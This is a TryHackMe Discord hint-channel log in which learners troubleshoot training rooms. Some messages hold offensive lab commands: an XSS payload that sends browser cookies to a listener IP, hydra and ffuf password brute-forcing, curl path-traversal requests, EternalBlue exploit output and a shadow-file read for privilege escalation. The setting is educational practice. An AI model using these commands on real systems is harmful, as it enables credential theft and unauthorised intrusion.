#room-hints
I did
I tried everything
The hint says client side or server side
How is "front end" not the answer
- front end - the way your browser renders a website
No
I did
Both incorrectly
I did
Of course it now says correct
I am trying this for the last 30 min
Someone changed something lol
Has to be
It was my second answer
Typed it 20 times
Even tried it with the "-"
Without
Capital letters
Nahhh I'm not crazy, someone fixed it
Pretty sure I didn't
But okay
hey guys I can't do this one https://tryhackme.com/room/tutorial
do we need a vpn?
can't understand, I get this problem
can't I do it on my machine and
?
but can't download vpn
it kept loading the ip
don't know why
ok wait, VirtualBox crashed and can't open, wait pls
now my Kali is not letting me open it, it keeps crashing
@burnt rivet
it's not even here
hey I can't set up vpn in Linux, I tried so much, done extracting it but can't do anything
so where to take it?
join vc ?
the open vpn?
can't understand wa ya, I downloaded these files
@burnt rivet this
ok ok
join vc, I am 14 man, I am dumb, I am new
I have opened the link you sent me
@burnt rivet sorry if I am annoying or something
??
how to download it, can you join vc? and help me get it
ya that's what I opened, OpenVPN GUI
I copied this OpenVPN GUI and pasted in the breos
I guess I'll have to include other extension types. Maybe search for files that have "backup" in their name as well.
I'm doing Task 4 of Network Services and I'm unable to download anything, or I don't know which folder the downloads are in. I use the syntax get [filename] and get: getting file [filename] of size [size] as [filename] ([size] kilobytes/sec) (average [size] kilobytes/sec). What am I doing wrong? Also, when I used this syntax yesterday, I got the downloads on my desktop.
I really need help downloading files using smbclient.
did you log in with smbclient?
at what part are you stuck?
I'm in the smbclient interface, and I'm using get [filename] but nothing is working.
That just outputs the file contents, but I need to download because copying and pasting the content of the private-key file and trying to use it gives the error Load key "[key file location] " : invalid format
you try to download ssh key, right?
right
did you cd in .ssh
yes
ok
don't forget to chmod it after download
is the download supposed to go to the Desktop of the linux machine? Because I still don't see anything
I think it goes in the folder you are in. if you are in documents then it goes there. if you are in music then it will be there
I have a folder THM and when I get a file it was there
I do boxes from that folder just to know where something goes when I get or download some content
I got it now. Thanks
cool
What file would have the usernames for smb users? I can't ssh into the user's smb account.
did you change ssh file chmod to 600 ?
if so use: ssh -i id_rsa IP
Hold on...
username I think is cactus
ssh -i id_rsa cactus@ipaddress
when you log in with smbclient you should find the username from clues
and in the enumeration process there are also clues for the username of the user
Thanks again.
enumeration is important to read. read the results from enum4linux that you ran before
take your time to check all around whenever you get into some machine. write down clues
@placid smelt what problem you got with Blue?
Tried running the eternalblue exploit, but all I get is no session created. What I did was I edited the RHOSTS to machine's ip and LHOST to IP provided by the vpn and then ran the exploit, but it failed like more than 10 times already.
Can I have your target IP?
Alright, give me a minute or two.
Sorry, some work came up. Anyways, here's the target IP: 10.10.209.73.
Looks like I messed up somewhere, let me try again.
Ait nvm, looks like it had to do something with the payload given x64 one didn't work, so changed it to generic one.
Thanks for the help.
try: sudo nmap -Pn -sC -sV 10.10.209.73 -v
Hey, I'm currently doing the blind xss example, when it says make sure to specify netcat port, does that mean 9001 or?
see [*] Started reverse TCP handler on 192.168.159.129:4444
[*] 10.10.167.144:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 10.10.167.144:445 - Rex::ConnectionTimeout: The connection with (10.10.167.144:445) timed out.
[*] 10.10.167.144:445 - Scanned 1 of 1 hosts (100% complete)
[-] 10.10.167.144:445 - The target is not vulnerable.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) >
the blue room in try hack me
your LHOST needs to be set to vpn profile
I am using the listener, how do I see what port I'm using for it? sorry I'm a bit confused lol
you set it yourself
ight
mm still didn't work
</textarea><script>fetch('http://10.10.233.196?cookie=' + btoa(document.cookie) );</script>
that's the script I have running
using my machine's ip as it says
and listening on 9001
w8. what room you doing
XSS
im on the practical example
all the other scripts worked, just seems to be my dumbass being unable to set it up right lol
try removing the </textarea> part
but do I not need that to escape the original textarea? as shown by the previous scripts
yeah that broke it as the script didn't leave the textarea
does it work or? not sure then why it's not
no it didn't, by removing the textarea the html sees it as a string rather than js, but even with the </textarea> it still isn't working
tbh, I'm probs just being dumb and not setting nc up right
no idea atm then
ight ty for the help doe
the attackbox ip?
that's what I was using
okay...
so
what should the url I put into the script look like?
as at the moment it's http://10.10.233.196
so I do add it onto the ip?
sorry this is the first time I've done this, I'm super confused lol
Heya all, is anyone else struggling on Wireshark: the basics question 2 from section 4? cf: https://tryhackme.com/room/wiresharkthebasics
#993868677600514130 there might already be answers in the chat there:)
also, have you read the full comment? you have to scroll down to the end
Ty for answering, this one?: https://tryhackme.com/forum/thread/62c3d7ab44dda20048a460b0
U talking about the last one from Khabibulix? It's me xD
nah, that's the forum; #993868677600514130 is a channel in this Discord :)
have you done this?
hello, I am in the Windows Forensics 1 room, cannot find the answer to this question: What is the complete path from where the python 3.8.2 installer was run?
I'm looking at the AmCache hive and the Shimcache CSV file
actually nevermind I just found a youtube video about it
I can't find the answer to this question from the 'Firewalls' room:
You need to allow SNMP over SSH, snmpssh. Which port should be permitted?
Google ain't helping :/
Burp Suite: Other Modules - Task 4, final flag
I know it's "key3", but I can't seem to get the correct answer... I'm taking the entire ssh key, applying an md5 hash right on top of that and then encoding the output into base64
I've tried not including the first and last line, but it didn't help...
The key should end with a new line
Room Sandbox Evasion: When I compile the .cpp file I get a (fatal error: urlmon.h: No such file or directory
#include <urlmon.h>). Command I used to compile it (g++ -Wall whoami.cpp -o whoamiExec)
It means you have not added urlmon to the libraries/dependencies for your visual studio project
This is covered in task 4 -> "Adding External Dependencies in Visual Studio" IIRC
The machine attached to the room should have it
@normal cliff ^
In Web Enumeration room, task 9, what do I fill in for cmnatics.playground?
probably nothing as that might be an example
you need to add the MACHINE_IP (which is the IP of the machine you've deployed in the room)
so
oh wait
no
that is an example yes
but you need to add 10.10.129.98 wpscan.thm
the cmnatics.playground is an example(:
I could probably make that clearer tbh let me do that now
wpscan.thm
10.10.129.98 wpscan.thm (assuming 10.10.129.98 is still the IP address)
that's it ((:
That is what I had already done.
Nothing shows when I hit "submit"
that's weird, i just submitted 767 and it has gone through
have you refreshed the page???
The TryHackMe page? No.
The FakeBank page? Yes.
also that is not the answer
if you can't enter answers and do not get the notification that says wrong answer, refresh the tryhackme page
which it is
the correct answer should be found by going to http://fakebank.com/ after doing the transfer
????
doubt that
can you send a screenshot of the page
weird
anything new on http://fakebank.com/bank-transfer/
No when I visit it again it just shows the default page
could you try and scroll up on the http://fakebank.com/ page to view things above the 767.68
well now the answer should be obvious... see the black/grey box
with the 🎉 in it
Thank you for your help
no problem
I still can't figure this out. The way I can get rid of the error is by adding this to the hosts file
- But then I get no results.
It shows only 60% is done but I did all of the tasks. What's next?
Thanks. It worked.
Gave +1 Rep to @burnt rivet
You should delete this, to avoid spoiling the flag for others.
And this one, lol 🙂
Done and done
I don't want to demoralise you, I'm not a mod either.
Good job on getting it done.
I understand
I'm on the Follina MSDT room, but question 4 is bugging me. I don't know what to do here
that room went private, so there's likely something broken with it 🤷♂️
Oh, it's not private for me, I started 30 mins ago
yeh, once you join you have access
oh
On Network Services, task 6, my nmap scan of the target machine shows no ports open but it says that answer is wrong. What type of scan do I use?
About how long does it take to scan all 65535 ports?
here is another type of hint that basically only applies to TryHackMe CTFs: nmap has a timing flag that can speed up its scans (-T4)
true just do not speed up real life scans as that will flood the networks with traffic that could cause problems
so you would probably go the other way around and slow down scans instead
well the same could be said about -T5 then maybe
and false negatives
same happened with -T4 for shadow too
depends on how much is going on on the network and a bit on luck
At my work, we are allowed to use -T3. T4 and T5 are a bit much
In Web Enumeration room, task 9, for the question "Enumerate the site, what is the name of the plugin that WPScan has found?", I ran wpscan --url http://wpscan.thm --enumerate p aggressive. WPScan found "||nextgen-gallery||" and "||nextcellent-gallery-nextgen-legacy||", but neither of those are the right answer. Should I run something else?
Thanks. I just hid the answers. Is that OK?
Gave +1 Rep to @burnt rivet
Is there a way to do a wpscan aggressive scan for users, or is that only possible for plugins?
Could someone plz let me know if the syntax for this is correct;
└──╼ $hydra -l Elliot -P fsocity.dic 10.10.124.243 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username" -t 30
Oh........
Could you tell me what is incorrect plz ?
Yes.....
With the dictionary from the site.......
I think so.....
I'm not sure to be honest.
No I am not.........
I'm not giving you signals.
So I should make sure the username is correct.
Is that what you're saying?
Okay, Thanks.
So should I use zoom?
how do i upload images
u need to verify first
Can someone give me a clue for this question in the CommonAttacks room?;
Where you have the option, which should you use as a second authentication factor between SMS based TOTPs or Authenticator App based TOTPs (SMS or App)?
I have, Many times.
The answer is not there.
It really is not there.
It is not.

MFA is not the answer
The question is;
Where you have the option, which should you use as a second authentication factor between SMS based TOTPs or Authenticator App based TOTPs (SMS or App)?
That question is stupid
There are no steps set in stone for MFA.
There are other integers of MFA.
The question is stupid.
Project ?
You must be joking !
Thanks for the hint though.
Hey can someone give me a hint for The Marketplace room ?
I've got in using XSS and found the first flag.
I know I've to use SQLMap, but don't know where :p
Okay NVM got it
It was really difficult with SQLmap
How do I do that?
How do I get my Discord token?
Nvm. The instructions are a little confusing
So on task 6 of Network Services, I did an nmap scan and got the open port and protocol. The next question however is this "Based on the title returned to us, what do we think this port could be used for?" I have no idea what title the question is referring to? What do I do?
or hear shadow out lassi it is broken with its ability to send pings to both the attackbox and your own attack vms but the other commands work
¯_(ツ)_/¯
at least seen it before not work with the pings to the attackbox
dunno why
Upload Vulnerabilities - Task 5, Question 2...
Uploading a shell just refreshes the page and doesn't show it in the resources... any help?
hi I need a hint on SQLi room
It is telling me to try different things when searching for a table
this is on time-based blind sqli
I get the first two lines of code right
but I can't figure out which table to search for
could someone help me with this?
I need a hint of course
I think I am just overthinking it at the moment so I'm gonna take a few minutes to try to figure this out
I am having trouble finding the table to use
it's not users or username
ok
so that makes sense
so I gotta reread this stuff when I have more energy
I'm gonna redo SQLi section from beginning when I have more energy
I think I just am tired right now so maybe not thinking clearly
For Network services , task 7, what type of protocol type is a "netcat reverse shell ?"
I don't understand the first question in Task 5 for Metasploit: Exploitation. How exactly do we know that the target is missing the MS17-010 patch based on the scan results?
You could use an nmap vuln script.
I started the machine and used the vuln script, this lists any vulns (on the ports I specified, you can do all) and it hit back with MS17-010 is Vulnerable, this can be useful in some CTF's.
It's 302 and it just shows the same page again
hi anyone can help?
state your problem don't just ask like this
Aka, say which room you're having trouble with, give the Link. Say what task it is, and which question. Then say what you've already tried and what you're having trouble with.
Hey thanks for this reply. I don't know if this was explained in the room or not, but I was going back and forth between using nmap inside msfconsole and in its own terminal, but both with default scripts. Another question, is there a way to search the nmap scripts database like you search in msfconsole?
Gave +1 Rep to @lucid junco
If you cd to /usr/share/nmap/scripts you'll be able to see all the scripts Nmap has, I'm sure there is a THM room that covers this (even if it's just partially)
hi I am doing the final task for Vulnversity to do privilege escalation, I am kinda stuck on how to escalate the privilege for the compromised system from user to root so I can read into a file, can anyone help, please
in order to become root, I am kinda lost, please if someone can help
what have you tried so far??? suid binaries???? sudo -l??? other
it doesn't work as I am in the system but kinda lost how to do privilege escalation
it tells me to access the /bin/passwd folder but I don't have rights to go in
Thanks. I'll look more into some nmap documentation as well.
Gave +1 Rep to @lucid junco
Is there any room that teaches Prototype Pollution?
the hint indicates that there is an exploit related to that systemctl
so i suggest to look at ||GTFObins||
Hi, If I have questions regarding the Capstone Challenge in junior pentester path, should I ask here or in #junior-pentester-path ?
Ok, I'll try not to spoil for those who haven't done it yet.
So, I started the challenge, supposed to look for the flags file. I tried a find but didn't find anything, I suppose the files are in a location I don't have access to then.
Below are the steps I've already tried,
||I already tried:
-sudoers ==> I'm not one of them
-capabilities ==> didn't see anything useful
-cron ==> no cronjobs defined
-PATH ==> there are a few folders in PATH that I have writable access to, maybe for the next step.
-NFS ==> no shared folders
I looked in /etc/passwd and bingo there's a second user "missy", maybe she does have access to it.
etc/shadow is not accessible but I was able to get the content thanks to base64 having the sticky bit.
I start the simple http server on the target machine but am not able to download anything using my attacker machine =/||
I wanted to ||download passwd and shadow and use unshadow on them to get the passwords but can't access the http server. I will try crackstation too to see if I can get something from there.||
I feel so stupid right now >_<....
Thanks, just got the first flag. On to the next one
We learned that one of the email accounts is lazie. What is the password used to access the IMAP service on
protocols and services 2
maybe the vm is not working
lol get the answer
tried to google it but no luck
in other rooms after a few days the vm worked and I got the answer after trying the commands again
so maybe I have the same problem again
hydra -l username -P wordlist.txt server service (this is the command I use)
shows no password match found
hydra -l username -P wordlist.txt server service
yes
server=10.10.139.131 imap
hydra -l lazie -vV -p wordlist.txt 10.10.139.131 imap
use even -vV
and without it
oh thanks
thank you very much lassi, you helped me
sometimes these little details make you break your head
I am doing the command the website tells me to and it says "running the above command will find a single working username and password ..."
but it isn't giving me any password output when I do the command
it told me to add the names I got from the previous command
oh 😄
I'm still not getting the password
Isn't there a new file "ilovelassi.txt" now 😄 ?
search in google, find a website, medium, he shows not only the answer but also the path to it
and explains why he uses it
this is how I've done it when I don't see how to solve it
right
agree
I always try to find out why and how
but I know the answer lies somewhere in the command, I have to change W1 with steve
but that didn't work for me, but I just saw in yt he did something like that
send the command here, not in a photo
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200
I already know the password tho 😄 but I want to find it myself
to get the accomplishment feeling
I am still a noob at this as you have noticed
it's ok, I'm also kind of new here, 3 months or 4, and trying to become a PT guy so I start here then move to hack the box then do some bandit games
I am starting my 2nd year bachelor cybersecurity in 2 months 😄
but I don't know if I should do all the rooms here or only the PT path
I finished my cyber bootcamp on 14/6/22, still looking for a job lol
even as soc
😮
hi I am trying to do challenge 3 and I think I am close but I want a hint now that I have redone all of LFI
I feel I am very close but missing something
could someone help?
ya I know the cloudfront thing is weird hold on a sec
ok there's the request
I didn't try to do that wtf?
hold on
Looks like the firefox settings page got intercepted.
oh
ok hold on
I switched it to the THM challenge instead of Mozilla and it's still not working hold on
ok hold on let me start this again from scratch
ok so I'm gonna start it again and see how it works
lol I feel shitty I hope that mistake didn't make THM mad
ok I'm gonna start the lab again
ok
so the challenge is basically chaining everything together and the reason I wasn't able to figure it out was just because I wasn't using Burp
or not everything but multiple things
ok thanks for the advice
ok
but it's basically chaining multiple components together
good idea
can someone give me a hint as to what I need to do? I am trying to do it without Burp
I changed request to post and
I also added an Admin cookie
I'm clearly missing something?
because in an earlier challenge I had to change request to POST to write to the file in order to get the result of that to show up in web page
and admin cookie to give myself administrator privileges because in a previous exercise you had to be admin to view page
what am I missing
maybe I'm not getting it conceptually?
inspect element
but it changed back to GET dynamically
hold on
i didn't think of that
yes I have used curl before
am I supposed to use FTP?
wait hold on
overthinking it
I typically would use curl to get web page source code
so are you saying to use curl with FTP?
that requires a password doesn't it?
ok hold on so no FTP I figured because doing curl to get web page wasn't working
ok so should I play with curl until I find it?
oh I see
ok thanks I will look this up
like I will research it
and think about it
so is this command on right track:
curl -d "user=Admin" -X POST http://10.10.245.232/challenges/index.php?file=../../../../etc/flag3
something like that?
ok I'm playing around with it now
something like:
curl -X POST http://10.10.245.232/challenges/chall3.php -H "application/x-www-form-urlencoded" -d "file=etc/flag3%00"
ok hold on
I'm trying to think through how to do this
I did it
hold on
thanks
ok
I'm gonna try the remote code execution challenge now
thank you so much
because the POST request from CURL wasn't filtered
only certain requests from within browser were filtered
ok I have to think about this
why did it work then and how did I figure it out? It makes no sense
aagh
ok. so the http request worked but then if http request wasn't blocked then why doesn't http request work within browser? because URL was filtered but other non-browser programs weren't?
that doesn't make sense to me
ok
so http requests weren't blocked but I had to feed the parameters into the URL bar? like I had to go into URL bar and specify parameters?
is that it?
I see
so HTTP POST requests weren't blocked
and I just couldn't figure out how to make an HTTP POST request that specifies parameters from within browser
I see
hold on I gotta get dinner
Ok back
So do I get it or no?
I’m assuming HTTP POST requests weren’t blocked and I just didn’t figure out how to make POST requests via browser?
I mean is that all it was?
Ok I understand that
I’m gonna try doing the RCE question
I’m gonna complete this challenge for sure
Then onto SQLi
and at this point aside from those two things I have completed intro to web hacking
Next thing just gotta learn next playlist
And then maybe learn burp?
This is gonna be good to expose myself to
After THM is HTB Academy a good next point?
I’m gonna complete all THM learning paths tho before I do that
Anyways for now onto RCE
I'm confused on this challenge
which file do I include?
hold on a sec let me try something
ok its not working
I am supposed to write script right? Which website do I upload the file to in order to link to it?
ok
but is that even doable in a TryHackMe VM?
do I need to do that to execute the command?
doesn't that cost money?
TryHackMe challenge requires me to pay?
I'm confused
is it $10 per month or no?
lol
ok but seriously, what free web server do they expect me to set up in VM?
oh I forgot about that
thanks for the reminder
ok
wouldn't this get you caught if you used your real computer's IP address?
like what attacker in their right mind would actually do this?
would they set up an anonymous web server or something?
like I would assume no one would want to actually do this attack in their right mind
lol what?
ok true
but I don't get your point
so anyone doing any of these things would be caught immediately
so what's the point in doing them?
lol
yes I get that
but RCE would get you caught even if you did use VPN or Tor networking right?
I mean you are specifying your IP address
ok so you would have to have a separate web server set up right?
like wouldn't doing it on your local machine be suicide?
oh right
I've used file hosting platforms so that sounds easy
that answers my question
lol I'm a law abiding citizen but if anyone is actually running a local server on their laptop and using that for RCE they are a fucktard because that's not how it's supposed to be done I suppose
but does anyone ever try to do that?
I imagine that cops would be at their house on day 1
if someone made that mistake
lol
ya I know totally
in all seriousness tho, I'm not gonna do that
lol
because I will get hacked if I stay legal and if I break the law, which I think is what you're assuming I would do, I would go to prison immediately
so ya I'm not gonna do that
ok
ok so no one would do that to begin with
they would just upload file to fileupload.com or something
I see
ok makes sense
btw I'm not doing this room right
I tried typing IP address of server in URL bar and and ; and echoing shell_exec("sh hostname_exec")
and I tried similar things in input bar
ok
I am gonna keep going then
thank you
I think that I need to take a break from this stuff for now so I'm gonna do something and come back to it
thank you tho
